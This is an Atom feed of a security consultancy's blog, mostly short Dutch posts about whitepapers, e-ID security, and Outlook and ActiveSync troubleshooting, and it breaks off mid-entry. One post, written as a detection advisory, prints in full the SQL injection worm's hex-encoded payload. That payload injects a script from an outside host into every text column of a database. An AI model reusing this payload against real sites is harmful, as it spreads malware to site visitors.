<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-901166975878910572</id><updated>2011-08-01T10:10:43.534-07:00</updated><category term='VPN'/><category term='LSP fix'/><category term='modsecurity'/><category term='SQL Injection'/><category term='webscarab'/><category term='owasp'/><category term='virus'/><category term='worm'/><category term='LinkScanner'/><category term='web application firewall'/><category term='netwerk problemen'/><category term='e-id'/><category term='webgoat'/><category term='web security'/><title type='text'>Erwin Geirnaert</title><subtitle type='html'>Over security, IT en meer</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>31</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-3865507292876353454</id><published>2010-03-01T02:21:00.000-08:00</published><updated>2010-03-01T02:24:36.707-08:00</updated><title type='text'>Moved my blog</title><content type='html'>Hi all,&lt;br /&gt;&lt;br /&gt;I moved my blog to http://www.zionsecurity.com/blog.aspx?show=Blog&lt;br /&gt;&lt;br /&gt;My first blog post is about the unsecure implementation of the Belgian eID module in Drupal!&lt;br /&gt;&lt;br /&gt;Hope to see you there,&lt;br /&gt;&lt;br /&gt;Erwin&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-3865507292876353454?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/3865507292876353454/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=3865507292876353454' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/3865507292876353454'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/3865507292876353454'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2010/03/moved-my-blog.html' title='Moved my blog'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-5100896565053447027</id><published>2009-11-03T03:47:00.000-08:00</published><updated>2009-11-03T04:26:32.842-08:00</updated><title type='text'>Windows Mobile &amp; ActiveSync troubleshooting</title><content type='html'>in English because I didn't find a good solution online!&lt;br /&gt;Problem: ActiveSync stopped working this weekend, and I received an error like "you don't have permissions in Exchange to sync" but that was BS. Nothing changed on my account.&lt;br /&gt;We had a customer with the same problem a few weeks ago: the same no permissions error and ActiveSync stopped working. This had to do, I think, with the change of summer to winter time and an incorrect date/time setting on the Windows Mobile.&lt;br /&gt;We all use client certificates, generated by our certificate authority and checking the properties of the certificate on my windows mobile showed that it was expired on Halloween! No error message indicating anything like it.&lt;br /&gt;Copy and installing a new certificate on my Windows Mobile with private key didn't solve the problem immediately. I think ActiveSync still used the old certificate but deleting the old certificate and rebooting the device solved the ActiveSync problem!&lt;br /&gt;&lt;br /&gt;I hope this is useful for some people because I was able to find the error message but not the solution!&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-5100896565053447027?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/5100896565053447027/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=5100896565053447027' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/5100896565053447027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/5100896565053447027'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/11/windows-mobile-activesync.html' title='Windows Mobile &amp; ActiveSync troubleshooting'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-969756171747070597</id><published>2009-08-03T08:15:00.000-07:00</published><updated>2009-08-03T08:16:23.491-07:00</updated><title type='text'>10 tips voor een veilige e-ID implementatie</title><content type='html'>Nieuwe whitepaper waarin we 10 tips meegeven voor een veilige implementatie van de Belgische elektronische identiteitskaart voor een web applicatie. Meer op http://www.zionsecurity.com/downloads/articles/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-969756171747070597?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/969756171747070597/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=969756171747070597' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/969756171747070597'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/969756171747070597'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/08/10-tips-voor-een-veilige-e-id.html' title='10 tips voor een veilige e-ID implementatie'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-7484602407076658279</id><published>2009-07-31T02:36:00.000-07:00</published><updated>2009-07-31T02:38:09.719-07:00</updated><title type='text'>Whitepaper ivm de selectie voor een veilige open-source CMS online</title><content type='html'>Onze whitepaper waarbij we Drupal, Joomla! en Typo3 vergelijken op basis van kwetsbaarheden, OWASP Top 10 en dergelijk is nu online te bekijken op onze nieuwe web site: http://www.zionsecurity.com/downloads/whitepapers/whitepaper-selecting-a-secure-open-source-content-management-system.aspx&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-7484602407076658279?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/7484602407076658279/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=7484602407076658279' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/7484602407076658279'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/7484602407076658279'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/07/whitepaper-ivm-de-selectie-voor-een.html' title='Whitepaper ivm de selectie voor een veilige open-source CMS online'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-6463077744284648105</id><published>2009-07-29T01:01:00.000-07:00</published><updated>2009-07-29T01:14:33.310-07:00</updated><title type='text'>SQL Injection worm is nog altijd alive, en nu ook voor ASP.NET</title><content type='html'>Onze web application firewall infrastructuur heeft een nieuwe variant gedetecteerd van de SQL Injection worm, die nu ook ASP.NET pagina's via Google aanvalt.&lt;br /&gt;&lt;br /&gt;de payload:&lt;br /&gt;POST /Page.aspx?id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005 \&lt;br /&gt;200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760 \&lt;br /&gt;06100720063006800610072002800320035003500290020004400450043004C004100520045002000540061006 \&lt;br /&gt;2006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730 \&lt;br /&gt;065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006 \&lt;br /&gt;F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C00750 \&lt;br /&gt;06D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006 \&lt;br /&gt;1006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0 \&lt;br /&gt;0780074007900700065003D003900390020006F007200200062002E00780074007900700065003D00330035002 \&lt;br /&gt;0006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E007800740 \&lt;br /&gt;07900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075007 \&lt;br /&gt;20073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020002000540 \&lt;br /&gt;0610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002 \&lt;br /&gt;0005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300 \&lt;br /&gt;02900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B002 \&lt;br /&gt;7002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740 \&lt;br /&gt;0720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002 \&lt;br /&gt;B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0 \&lt;br /&gt;068007400740070003A002F002F006100300076002E006F00720067002F0078002E006A0073003E003C002F007 \&lt;br /&gt;300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460 \&lt;br /&gt;052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002 \&lt;br /&gt;000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0 \&lt;br /&gt;043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C006 \&lt;br /&gt;5005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.0&lt;br /&gt;&lt;br /&gt;dit is ASCII HEX encoding. Burp Suite heeft hier geen problemen mee :)&lt;br /&gt;&lt;br /&gt;Het enige verschil met de SQL injection worm van 2008 is de script payload met een link naar a0v.org/x.js (niet bezoeken!)&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-6463077744284648105?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/6463077744284648105/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=6463077744284648105' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/6463077744284648105'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/6463077744284648105'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/07/sql-injection-worm-is-nog-altijd-alive.html' title='SQL Injection worm is nog altijd alive, en nu ook voor ASP.NET'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-5392644741938688776</id><published>2009-07-24T06:57:00.006-07:00</published><updated>2009-07-24T07:00:21.524-07:00</updated><title type='text'>Beta testers voor onze Mollom client gezocht</title><content type='html'>Voor wie Mollom niet kent: anti-spam oplossing voor web applicaties zodat er geen spam in berichten te recht komt. Wordt oa gebruikt door onze vrienden van Netlog.&lt;br /&gt;Mollom heeft sinds het begin al 100 millioen berichten gestopt: http://mollom.com/blog/hundred-million-spam-attempts-blocked&lt;br /&gt;&lt;br /&gt;ZION SECURITY heeft een plug-in voor IIS ontwikkeld waarbij we ASP en ASP.NEt sites kunnen integreren met Mollom, zonder dat er een lijn code aan de huidige applicatie moet worden gewijzigd.&lt;br /&gt;&lt;br /&gt;interesse? contacteer ons op info@zionsecurity.com&lt;br /&gt;&lt;br /&gt;BTW: Mollom heeft een gratis versie!&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-5392644741938688776?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/5392644741938688776/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=5392644741938688776' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/5392644741938688776'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/5392644741938688776'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/07/beta-testers-voor-onze-mollom-client.html' title='Beta testers voor onze Mollom client gezocht'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-8811675181518616009</id><published>2009-07-24T06:57:00.003-07:00</published><updated>2009-07-24T06:57:56.450-07:00</updated><title type='text'>Nu ook op Twitter</title><content type='html'>Te volgen via http://twitter.com/zionsecurity&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-8811675181518616009?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/8811675181518616009/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=8811675181518616009' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/8811675181518616009'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/8811675181518616009'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/07/nu-ook-op-twitter.html' title='Nu ook op Twitter'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-200574112088008925</id><published>2009-07-24T06:57:00.001-07:00</published><updated>2009-07-24T06:57:28.737-07:00</updated><title type='text'>Volgende whitepaper: vergelijking van Drupal, Typo3 en Joomla! op security</title><content type='html'>Wordt volgende week gelanceerd!&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-200574112088008925?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/200574112088008925/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=200574112088008925' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/200574112088008925'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/200574112088008925'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/07/volgende-whitepaper-vergelijking-van.html' title='Volgende whitepaper: vergelijking van Drupal, Typo3 en Joomla! op security'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-4257445180706763322</id><published>2009-07-24T06:55:00.000-07:00</published><updated>2009-07-24T06:57:01.803-07:00</updated><title type='text'>Een overzicht van de problemen van web application security</title><content type='html'>nieuwe whitepaper is online: http://www.zionsecurity.com/news/whitepaper-an-overview-of-the-current-situation-in-the-web-application-security-landscape.aspx&lt;br /&gt;&lt;br /&gt;We geven een overzicht van de problemen, gebaseerd op statistieken van WhiteHat Security, de Web Hacking Incident database en onze ervaringen&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-4257445180706763322?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/4257445180706763322/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=4257445180706763322' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/4257445180706763322'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/4257445180706763322'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/07/een-overzicht-van-de-problemen-van-web.html' title='Een overzicht van de problemen van web application security'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-542299111386601116</id><published>2009-06-10T07:41:00.000-07:00</published><updated>2009-06-10T07:42:50.737-07:00</updated><title type='text'>Zend vs OWASP ESAPI is klaar</title><content type='html'>Ik verwijs gewoon door naar onze website waar de whitepaper voorhanden is:&lt;br /&gt;http://www.zionsecurity.com/downloads/whitepapers.aspx#ZENDWHITEPAPER&lt;br /&gt;&lt;br /&gt;Een duidelijk overzicht van Zend vs OWASP Enterprise Security API en de OWASP Top 10.&lt;br /&gt;&lt;br /&gt;Hopelijk zijn jullie er iets mee...&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-542299111386601116?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/542299111386601116/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=542299111386601116' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/542299111386601116'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/542299111386601116'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/06/zend-vs-owasp-esapi-is-klaar.html' title='Zend vs OWASP ESAPI is klaar'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-6839322852935371702</id><published>2009-05-19T13:35:00.002-07:00</published><updated>2009-05-19T13:36:52.062-07:00</updated><title type='text'>Zend &amp; OWASP ESAPI for PHP</title><content type='html'>Binnenkort publiceren we een whitepaper ivm het gebruik van het Zend framework voor software ontwikkeling en de tekortkomingen op vlak van beveiliging.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-6839322852935371702?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/6839322852935371702/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=6839322852935371702' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/6839322852935371702'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/6839322852935371702'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/05/zend-owasp-esapi-for-php.html' title='Zend &amp; OWASP ESAPI for PHP'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-5388339338341027723</id><published>2009-05-19T13:35:00.001-07:00</published><updated>2009-05-19T13:35:32.080-07:00</updated><title type='text'>Got Twitter?</title><content type='html'>Sinds kort ook ZION SECURITY op Twitter. Volg ons op http://twitter.com/zionsecurity&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-5388339338341027723?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/5388339338341027723/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=5388339338341027723' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/5388339338341027723'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/5388339338341027723'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/05/got-twitter.html' title='Got Twitter?'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-1202710171909129485</id><published>2009-05-19T13:33:00.000-07:00</published><updated>2009-05-19T13:34:58.494-07:00</updated><title type='text'>Welkom Cigital</title><content type='html'>Cigital neemt de Europese activiteiten van Security Innovation Inc over. Dit bericht bevestigt de groeimarkt van software security in Europa.&lt;br /&gt;Goed nieuws dus voor ons als software security experts.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-1202710171909129485?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/1202710171909129485/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=1202710171909129485' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/1202710171909129485'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/1202710171909129485'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/05/welkom-cigital.html' title='Welkom Cigital'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-3851251340640395947</id><published>2009-05-19T13:26:00.000-07:00</published><updated>2009-05-19T13:33:06.499-07:00</updated><title type='text'>Office 2007 over een VPN connectie</title><content type='html'>Outlook 2007 heeft het moeilijk met een VPN connectie naar Exchange. Zoeken op Google geeft veel resultaten maar zonder concrete oplossingen. Uiteindelijk is het heel eenvoudig. Aangezien Exchange en Active Directory sterk geïntegreerd zijn, is DNS een belangrijke bron voor Outlook om te weten hoe en waar Exchange zich bevindt.&lt;br /&gt;Outlook 2007 moet dus DNS queries kunnen versturen naar de corporate DNS Server. Als men niet op een corporate netwerk is geconnecteerd, dan gebruikt men de DNS server van de ISP die natuurlijk niet de nodige DNS entries heeft voor Outlook 2007. Men moen de VPN client dan configureren om de DNS voor het domein over de VPN tunnel te sturen naar de corporate DNS; Dit kan in Check Point dmv een SecureDNS Server toe te voegen als object en naar te verwijzen in de globale properties.&lt;br /&gt;&lt;br /&gt;In English: to use Outlook 2007 across a VPN connection, the client must use the DNS server of the corporate network and not the DNS of the ISP. Also remote offices must use the DNS server of the corporate network to resolve the DNS queries for the local domain.&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-3851251340640395947?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/3851251340640395947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=3851251340640395947' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/3851251340640395947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/901166975878910572/posts/default/3851251340640395947'/><link rel='alternate' type='text/html' href='http://erwingeirnaert.blogspot.com/2009/05/office-2007-over-een-vpn-connectie.html' title='Office 2007 over een VPN connectie'/><author><name>Erwin Geirnaert</name><uri>http://www.blogger.com/profile/06369526872794527942</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-901166975878910572.post-256528796635471918</id><published>2009-04-24T02:51:00.001-07:00</published><updated>2009-04-24T02:54:00.987-07:00</updated><title type='text'>Interessant document ivm Core JEE patterns en security</title><content type='html'>Secure Compass heeft de Core JEE patterns bekeken met een security pet op en een interessant document gemaakt over de beperkingen en de bijhorende controles die nodig zijn.&lt;br /&gt;&lt;br /&gt;Interessant zou zijn om te bekijken waar de OWASP ESAPI voor Java kan worden gebruikt.&lt;br /&gt;&lt;br /&gt;http://72.55.169.126/papers/Security%20Analysis%20of%20Core%20JEE%20Design%20Patterns%20v0%2020.pdf&lt;div class="blogger-post-footer"&gt;Erwin Geirnaert is partner bij ZION SECURITY (http://www.zionsecurity.com)&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/901166975878910572-256528796635471918?l=erwingeirnaert.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://erwingeirnaert.blogspot.com/feeds/256528796635471918/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=901166975878910572&amp;postID=256528796635471918' title='0 Comments'/><link rel='edit' 